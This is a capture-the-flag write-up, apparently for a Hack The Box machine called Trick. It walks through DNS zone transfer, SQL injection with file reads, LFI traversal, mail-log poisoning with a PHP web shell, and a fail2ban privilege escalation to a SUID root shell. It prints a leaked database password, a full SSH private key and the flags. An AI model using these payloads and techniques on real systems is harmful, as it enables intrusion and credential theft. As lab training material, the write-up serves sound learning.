Trick

Recon

nmap_scan.log

Open 10.129.141.189:25
Open 10.129.141.189:22
Open 10.129.141.189:53
Open 10.129.141.189:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.141.189

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
|   256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open  smtp?   syn-ack
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open  domain  syn-ack ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    syn-ack nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: nginx/1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DNS (53)

└─$ dig -x 10.129.141.189 @10.129.141.189 | grep -vE '^$|;'
189.141.129.10.in-addr.arpa. 604800 IN  PTR     trick.htb.
141.129.10.in-addr.arpa. 604800 IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1

└─$ dig axfr trick.htb @10.129.141.189 | grep -vE '^$|;'
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
preprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800

└─$ dig ANY trick.htb @10.129.141.189 | grep -vE '^$|;'
trick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN      NS      trick.htb.
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1
trick.htb.              604800  IN      A       127.0.0.1
trick.htb.              604800  IN      AAAA    ::1

HTTP (80)

Writeup.png

Main domain is just serving index.html.

Subdomain from DNS is serving PHP application, but it's protected with login form.

Writeup-1.png

└─$ feroxbuster -u 'http://preprod-payroll.trick.htb/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -I .css,.png -x .php -n
200      GET        0l        0w        0c http://preprod-payroll.trick.htb/ajax.php
302      GET      267l      527w     9546c http://preprod-payroll.trick.htb/index.php => login.php
...
302      GET      267l      527w     9546c http://preprod-payroll.trick.htb/ => login.php
301      GET        7l       12w      185c http://preprod-payroll.trick.htb/database => http://preprod-payroll.trick.htb/database/
200      GET        0l        0w        0c http://preprod-payroll.trick.htb/db_connect.php
500      GET        1l        0w        2c http://preprod-payroll.trick.htb/view_employee.php
200      GET       77l      166w     2473c http://preprod-payroll.trick.htb/manage_employee.php
200      GET       95l      155w     2717c http://preprod-payroll.trick.htb/employee.php
200      GET       45l      100w     2548c http://preprod-payroll.trick.htb/header.php
200      GET       27l       31w      486c http://preprod-payroll.trick.htb/home.php
200      GET      177l      313w     5571c http://preprod-payroll.trick.htb/login.php
200      GET       44l       86w     1259c http://preprod-payroll.trick.htb/manage_user.php
200      GET       81l      141w     2197c http://preprod-payroll.trick.htb/users.php
[####################] - 18s     4792/4792    0s      found:42      errors:2
[####################] - 17s     4728/4728    271/s   http://preprod-payroll.trick.htb/ 

Some pages display without authorization and some are just includes.

• http://preprod-payroll.trick.htb/users.php

• http://preprod-payroll.trick.htb/manage_user.php

• http://preprod-payroll.trick.htb/employee.php

• http://preprod-payroll.trick.htb/manage_employee.php

Writeup-2.png

In /employee.php source we see Javascript making calls to /view_employee.php?id=<ID>

$('.view_employee').click(function(){
	var $id=$(this).attr('data-id');
	uni_modal("Employee Details","view_employee.php?id="+$id,"mid-large")
});

Using EmployeeID doesn't show anything.

└─$ ffuf -u 'http://preprod-payroll.trick.htb/view_employee.php?id=FUZZ' -w <(seq 1 100) -fl 96
9                       [Status: 200, Size: 4992, Words: 326, Lines: 133, Duration: 80ms]

http://preprod-payroll.trick.htb/view_employee.php?id=9

Writeup-3.png

Testing for SQLi:

# Success
http://preprod-payroll.trick.htb/view_employee.php?id=9 AND 1=1 -- -

# Fail
http://preprod-payroll.trick.htb/view_employee.php?id=9 AND 2=1 -- -

└─$ sqlmap -u 'http://preprod-payroll.trick.htb/view_employee.php?id=9' -p id --dbms=MySQL --technique=U --batch --threads=10
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=-8500 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b7a7871,0x646d6678496c66754c70736874576a76584f4962636a58655356724f4f78684744704c586d48524f,0x717a7a7071)-- -
---
└─$ sqlmap -u 'http://preprod-payroll.trick.htb/view_employee.php?id=9' -p id --dbms=MySQL --technique=U --batch --threads=10 --current-db
current database: 'payroll_db'

└─$ sqlmap -u 'http://preprod-payroll.trick.htb/view_employee.php?id=9' -p id --dbms=MySQL --technique=U --batch --threads=10 -D payroll_db --tables
Database: payroll_db
[1 table]
+----------+
| position |
+----------+
└─$ sqlmap -u 'http://preprod-payroll.trick.htb/view_employee.php?id=9' -p id --dbms=MySQL --technique=U --batch --threads=10 -D payroll_db --dump
Database: payroll_db
Table: position
[1 entry]
+----+
| id |
+----+
| 1  |
+----+

Database is completely empty. Let's see what current user can do, --os-shell failed to work.

└─$ sqlmap -u 'http://preprod-payroll.trick.htb/view_employee.php?id=9' --privileges --roles
[08:23:28] [INFO] fetching database users privileges
database management system users privileges:
[*] 'remo'@'localhost' [1]:
    privilege: FILE
[08:23:29] [INFO] fetching database users privileges
database management system users roles:
[*] 'remo'@'localhost' [1]:
    role: FILE

https://dev.mysql.com/doc/refman/8.4/en/privileges-provided.html -> FILE -- File_priv -- File access on server host

---

I thought sqlmap failed to read files, but no. It's just not displaying it on STDOUT

└─$ sqlmap -u 'http://preprod-payroll.trick.htb/view_employee.php?id=9' --batch --file-read=/etc/hostname 
files saved to [1]:
[*] /home/woyag/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_hostname (same file)
└─$ cat /home/woyag/.local/share/sqlmap/output/preprod-payroll.trick.htb/files/_etc_hostname
trick

---

Do it manually

└─$ curl 'http://preprod-payroll.trick.htb/view_employee.php?id=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,LOAD_FILE(%27/etc/passwd%27)%20--%20-' -s | grep sh$
                <p><b>Position : Root:x:0:0:root:/root:/bin/bash
Michael:x:1001:1001::/home/michael:/bin/bash
└─$ curl 'http://preprod-payroll.trick.htb/view_employee.php?id=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,LOAD_FILE(%27/etc/nginx/sites-enabled/default%27)%20--%20-' -s
Position : Server {
        Listen 80 Default_server;
        Listen [::]:80 Default_server;
        Server_name Trick.htb;
        Root /var/www/html;

        Index Index.html Index.htm Index.nginx-debian.html;

        Server_name _;

        Location / {
                Try_files $uri $uri/ =404;
        }

        Location ~ \.php$ {
                Include Snippets/fastcgi-php.conf;
                Fastcgi_pass Unix:/run/php/php7.3-fpm.sock;
        }
}

Server {
        Listen 80;
        Listen [::]:80;

        Server_name Preprod-marketing.trick.htb;

        Root /var/www/market;
        Index Index.php;

        Location / {
                Try_files $uri $uri/ =404;
        }

        Location ~ \.php$ {
                Include Snippets/fastcgi-php.conf;
                Fastcgi_pass Unix:/run/php/php7.3-fpm-michael.sock;
        }
}

Server {
        Listen 80;
        Listen [::]:80;

        Server_name Preprod-payroll.trick.htb;

        Root /var/www/payroll;
        Index Index.php;

        Location / {
                Try_files $uri $uri/ =404;
        }

        Location ~ \.php$ {
                Include Snippets/fastcgi-php.conf;
                Fastcgi_pass Unix:/run/php/php7.3-fpm.sock;
        }
}
└─$ curl 'http://preprod-payroll.trick.htb/view_employee.php?id=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,LOAD_FILE(%27/var/www/payroll/db_connect.php%27)%20--%20-' -s
$conn= New Mysqli('localhost','remo','TrulyImpossiblePasswordLmao123','payroll_db')or Die("Could Not Connect To Mysql".mysqli_error($con));

We leaked the application full path from Nginx configuration and then leaked the database configuration.

No luck on SSH, but we have another host

└─$ sshpass -p 'TrulyImpossiblePasswordLmao123' ssh michael@trick.htb
Permission denied, please try again.

Writeup-4.png

The website is vulnerable to LFI, but we already have LFI with MySQL... (?)

└─$ curl 'http://preprod-payroll.trick.htb/view_employee.php?id=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,LOAD_FILE(%27/var/www/market/index.php%27)%20--%20-' -s
		<p><b>Position : <?php
$file = $_GET['page'];

If(!isset($file) || ($file=="index.php")) {
   Include("/var/www/market/home.html");
}
Else{
	Include("/var/www/market/".str_replace("../","",$file));
}

It's doesn't mention, but other service might be running this.

└─$ curl -s 'http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././/etc/hostname'
trick

SMTP is running, but there's no mail in /var/mail/USERNAME 🤔

└─$ curl -s 'http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././/var/mail/michael'

If we can send mail and include it with PHP that would get us code execution!

└─$ swaks --to michael --server trick.htb --body Hello
└─$ curl -s 'http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././/var/mail/michael'
From woyag@kraken  Sat Dec 14 14:58:24 2024
Return-Path: <woyag@kraken>
X-Original-To: michael
Delivered-To: michael@debian.localdomain
Received: from kraken (unknown [10.10.14.113])
        by debian.localdomain (Postfix) with ESMTP id F332F4099C
        for <michael>; Sat, 14 Dec 2024 14:58:23 +0100 (CET)
Date: Sat, 14 Dec 2024 08:58:04 -0500
To: michael
From: woyag@kraken
Subject: test Sat, 14 Dec 2024 08:58:04 -0500
Message-Id: <20241214085804.453250@kraken>
X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/

Hello

Looks good, we are able to send emails.

└─$ swaks --to michael --server trick.htb --body '<?php echo system($_REQUEST[0]); ?>'
└─$ curl -s 'http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././/var/mail/michael' -d '0=id'
...
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
└─$ curl -s 'http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././/var/mail/michael' -d '0=cat ~/.ssh/id_rsa'
...
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

SSH (22)

└─$ nano michael.id_rsa
└─$ chmod 600 michael.id_rsa
└─$ ssh michael@trick.htb -i michael.id_rsa
michael@trick:~$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

User.txt

michael@trick:~$ cat user.txt
f994ad0cda244cb305d740aefb1c7bbe

Privilege Escaltion

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart
michael@trick:~$ find / -group security -ls 2>/dev/null
   269281      4 drwxrwx---   2 root     security     4096 Dec 14 15:36 /etc/fail2ban/action.d
michael@trick:~$ find / -user security -ls 2>/dev/null

As part of security we have write permissions in fail2ban directory.

Fail2Ban – Linux Privilege Escalation

Change the rule and restart the service

michael@trick:/etc/fail2ban$ sed -i '/^actionban = /c\actionban = install -m4777 /bin/bash /tmp/rootbash' ./action.d/iptables-multiport.conf
michael@trick:/etc/fail2ban$ sudo /etc/init.d/fail2ban restart
[ ok ] Restarting fail2ban (via systemctl): fail2ban.service.
michael@trick:/etc/fail2ban$ cat /etc/fail2ban/action.d/iptables-multiport.conf | grep actionban
# Notes.:  command executed once before each actionban command
# Option:  actionban
actionban = install -m4777 /bin/bash /tmp/rootbash

fail2ban works by banning the IPs that try to bruteforce SSH for example, perform bruteforce so actionban will trigger

└─$ hydra -l letmein -P <(seq 1 100) trick.htb ssh -v

michael@trick:/etc/fail2ban$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1168776 Dec 14 15:51 /tmp/rootbash
michael@trick:/etc/fail2ban$ /tmp/rootbash -p
rootbash-5.0# id
uid=1001(michael) gid=1001(michael) euid=0(root) groups=1001(michael),1002(security)

User.txt

rootbash-5.0# cat /root/root.txt
d82a75c2cbee6f12f26427f8d023049f